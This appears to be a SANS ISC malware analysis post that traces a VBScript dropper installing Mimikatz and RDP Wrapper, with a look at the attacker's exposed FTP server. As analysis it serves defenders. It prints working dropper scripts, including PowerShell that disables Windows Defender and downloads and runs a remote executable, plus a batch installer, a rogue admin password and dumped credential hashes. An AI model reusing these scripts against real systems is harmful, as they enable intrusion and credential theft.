Simple Mimikatz & RDPWrapper Dropper

Published: 2019-08-22. Last Updated: 2019-08-23 04:55:06 UTC
by Xavier Mertens (Version: 1)
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Let’s review a malware sample that I spotted a few days ago. I found it interesting because it's not using deep techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I started to hunt for more Powershell based on encoded directives. The following regular expression matched on the file:

// New-Object
$enc09 = /(TmV\x33LU\x39iamVjd[A-P]|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])/

The initial script (SHA256:bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine[1]. Here is a beautified version of the script:

sDir = "C:\ProgramData\ID.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
If oFSO.FileExists(sDir) Then
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    WScript.Quit()
Else
    wscript.sleep(333000)
    Dim ShaDev
    set hfhejotgbhzlzyohafchtul = createobject("wscript.shell")
    ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%")
    Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
    shadow.dataType="bin.base64"       
    shadow.text="... [Base64 chunk of dat] ..."
    Set sexy=CreateObject("ADODB.Stream")
    sexy.Type=1
    sexy.Open
    sexy.Write shadow.nodeTypedValue
    sexy.SaveToFile ShaDev & "\WindowsProtect.vbs",2
    wscript.sleep(4000)

    Sub KillAll(ProcessName)
        Dim objWMIService, colProcess
        Dim strComputer, strList, p
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
        Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'")
        For Each p in colProcess
            p.Terminate             
        Next
    End Sub

    KillAll "cmd.exe"

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Do
        Running = False
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
        For Each objItem in colItems
            If objItem.Name = "cmd.exe" Then
                Running = True
                Exit For
            End If
        Next
        If Not Running Then
            Set objShell = CreateObject("Shell.Application")
            objShell.ShellExecute "cmd", "/k ""C:\ProgramData\WindowsProtect.vbs", "", "runas", 0
        End If
    Loop While Not Running
    WScript.Sleep 4000

    KillAll "cmd.exe"

    Dim fso, MyFile
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set MyFile = fso.CreateTextFile("C:\ProgramData\ID.dat", True)
    MyFile.WriteLine(" ")
    MyFile.Close

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    WScript.Quit()
End If

Not obfuscated, it is easy to understand its behaviour: First, it checks the presence of itself (if the victim has already been infected) by checking the existence of an ‘ID.dat’ file. If it exists, it removes the file and exits. Otherwise, another second-stage VBScript is decoded, dumped on disks and executed (‘WindowsProtect.vbs’). Let’s have a look at the second stage.

The decoded Base64 data (SHA256:6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8)  is unknown on VT. Here is the script:

Dim x
Dim y
Dim z
x = " Set-MpPreference -DisableIOAVProtection $true"
y = " Add-MpPreference -ExclusionPath 'C:\'"
z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:\ProgramData\Isass.exe');Start-Process 'C:\ProgramData\Isass.exe'"
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
command = ("powershell" & x )
commany = ("powershell" & y )
commanz = ("powershell" & z )
objShell.Run command,0
wscript.sleep(4000)
objShell.Run commany,0
wscript.sleep(11000)
objShell.Run commanz,0
Set objShell = Nothing
wscript.sleep(4000)
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit

The next stage is, of course, the malicious PE file (SHA256:b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd) and is also unknown on VT. It’s a classic PE file:

root@remnux:~# exiftool Isass.exe
ExifTool Version Number         : 9.46
File Name                       : Isass.exe
Directory                       : /tmp
File Size                       : 4.6 MB
File Modification Date/Time     : 2019:08:22 14:44:24-04:00
File Access Date/Time           : 2019:08:22 14:44:23-04:00
File Inode Change Date/Time     : 2019:08:22 14:44:24-04:00
File Permissions                : rw-r--r--
File Type                       : Win32 EXE
MIME Type                       : application/octet-strea
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2017:08:11 09:54:06-04:00
PE Type                         : PE32
Linker Version                  : 14.0
Code Size                       : 188928
Initialized Data Size           : 69632
Uninitialized Data Size         : 0
Entry Point                     : 0x1cec9
OS Version                      : 5.1
Image Version                   : 0.0
Subsystem Version               : 5.1
Subsystem                       : Windows GUI

The PDB path ('D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb') discloses that the PE file is a self-extracting archive. Program Data Base files are used to keep debugging info about a program when it is compiled. The PDB stores many interesting data like symbols, addresses, names of resources etc. 

SFX files can execute a script once the content is unpacked. Easy to detect in the PE strings:

root@remnux:~# strings Isass.exe | grep Setup=
Setup=%SystemDrive%\Intel\Logs\h32.exe %SystemDrive%\Intel\Logs\beforeinstall.bat

Here is an extract of the script:

@echo off
set CURRENTPATH=%SystemDrive%\Intel\Logs
set INSTALLPATH=%SystemDrive%\ProgramData\Microsoft\Windows\Updates

mkdir %INSTALLPATH%
del /F /Q %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\Tor  %INSTALLPATH%
move /Y %CURRENTPATH%\Data %INSTALLPATH%
move /Y %CURRENTPATH%\Service %INSTALLPATH%
move /Y %CURRENTPATH%\h64.exe %INSTALLPATH%\h64.exe
move /Y %CURRENTPATH%\h32.exe %INSTALLPATH%\h32.exe
move /Y %CURRENTPATH%\zip.exe %INSTALLPATH%\zip.exe
move /Y %CURRENTPATH%\ncftpput.exe %INSTALLPATH%\ncftpput.exe
move /Y %CURRENTPATH%\ftps.cfg %INSTALLPATH%\ftps.cfg
move /Y %CURRENTPATH%\install.bat %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\mimitask.bat %INSTALLPATH%\mimitask.bat

reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT

if %OS%==32BIT set hidexe=h32.exe
if %OS%==64BIT set hidexe=h64.exe

cd %INSTALLPATH%
%hidexe% install.bat >> %INSTALLPATH%\Service\install.log 2>>&1

cd %CURRENTPATH%
rmdir /S /Q %CURRENTPATH%\Tor
rmdir /S /Q %CURRENTPATH%\Data
rmdir /S /Q %CURRENTPATH%\Tor
DEL /Q /F %CURRENTPATH%\Data
DEL /Q /F %CURRENTPATH%\Service
DEL /Q /F %CURRENTPATH%\h64.exe
DEL /Q /F %CURRENTPATH%\h32.exe
DEL /Q /F %CURRENTPATH%\zip.exe
DEL /Q /F %CURRENTPATH%\ncftpput.exe
DEL /Q /F %CURRENTPATH%\ftps.cfg
DEL /Q /F %CURRENTPATH%\install.bat
DEL /Q /F %CURRENTPATH%\mimitask.bat
rmdir /S /Q %CURRENTPATH%
DEL /Q /F  "%~f0" > NUL

You can see that many files are dropped on the infected computer. The more interesting ones are:

  • ncftpput.exe
  • ftps.cfg
  • mimikatz.bat
  • install.bat
  • ToR package

The ‘install.bat’ script is also very interesting (SHA256:550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) and also unknow on VT. Too big to be posted here, here is an overview of its features:

  • Check the geographical location of the victim via different GeoIP services
  • Create a new administrator user ('Admlnlstrator') with the following password: ‘Zhopka222222'
  • Disable Windows Defender
  • Install RDP Wrapper library[2]
  • Dump credentials via Mimikatz
  • Install a scheduled task to re-execute Mimikatz and exfiltrate data at each boot time.

The RDP wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/:

Collected data are exfiltrated via FTP (FTP is still alive!) via the ncftpput.exe tool. The configuration is present in the archive in the ftps.cfg file:

root@remnux:~# cat ftps.cfg
host etomakra.me
user ftpuser
pass Super123123

Yes, even attackers use weak passwords! The server is not protected and allows to download all files collected from victims. The domain 'etomakra.me' has been registered on July 16th 2019.

I synchronized them during a few days (now the FTP server is down). For each victim, two files were uploaded:

The first one contains the malware installation logs:

root@remnux:~# unzip -t PLAYBOX1_RDP.zip
Archive:  PLAYBOX1_RDP.zip
    testing: Program Files/RDP Wrapper/hostname.log   OK
    testing: Program Files/RDP Wrapper/installer.log   OK
    testing: Program Files/RDP Wrapper/tor_install.log   O
No errors detected in compressed data of PLAYBOX1_RDP.zip.

The second one contains the output of Mimikatz:

root@remnux:~# unzip -t DESKTOP-UII5HVF_82742.zip
Archive:  DESKTOP-UII5HVF_82742.zip
    testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt   OK
No errors detected in compressed data of DESKTOP-UII5HVF_82742.zip.

Each archive contains the same file 'credoz.txt':

root@remnux:~# head -30 credoz.txt
Hostname: [redacted] / authority\system-authority\system

  .#####.   mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 2254335948 (00000000:865e6fcc)
Session           : RemoteInteractive from 2
User Name         : Admlnlstrator
Domain            : [redacted]
Logon Server      : [redacted]
Logon Time        : 2019/08/17 19:33:43
SID               : S-1-5-21-2984074050-2788484596-579673664-1006
        msv :
         [00000003] Primary
         * Username : Admlnlstrator
         * Domain   : [redacted]
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
         [00010000] CredentialKeys
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
        tspkg :
        wdigest :
         * Username : Admlnlstrator

You can see that the rogue administrator account has been used. In one week, I collected 188 credential files from the FTP server! Based on the re-upload of new files at every reboot, the number of unique victims is 53:

root@remnux:~# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l
53

Did you see the same kind of activity? Do you have more information about this malware? Feel free to share!

[1] https://www.virustotal.com/gui/file/bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5/detection
[2] https://github.com/stascorp/rdpwrap/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

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ISC Stormcast For Thursday, August 22nd 2019 https://isc.sans.edu/podcastdetail.html?id=6632

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